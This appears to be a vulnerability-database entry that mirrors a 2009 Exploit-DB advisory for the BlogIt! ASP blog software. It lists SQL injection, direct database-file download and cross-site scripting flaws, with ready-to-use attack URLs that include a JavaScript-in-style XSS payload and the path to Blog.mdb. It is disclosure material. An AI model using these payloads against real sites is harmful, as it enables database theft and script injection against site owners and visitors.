BlogIt! Vulnerabilities

vendor:

BlogIt!

by:

Pouya_Server

7.5

CVSS

HIGH

SQL/DD/XSS

89, 22, 79

CWE

Product Name: BlogIt!

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The BlogIt! application is vulnerable to SQL injection, directory traversal and XSS attacks. An attacker can exploit the SQL injection vulnerability by sending malicious SQL queries to the vulnerable parameter 'day' in the 'index.asp' page. The directory traversal vulnerability can be exploited by accessing the 'Blog.mdb' file in the 'database' directory. The XSS vulnerability can be exploited by sending malicious JavaScript code to the 'view' parameter in the 'index.asp' page.

Mitigation:

Input validation should be used to prevent SQL injection, directory traversal and XSS attacks.

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL/DD/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
---------------------------------

# milw0rm.com [2009-01-16]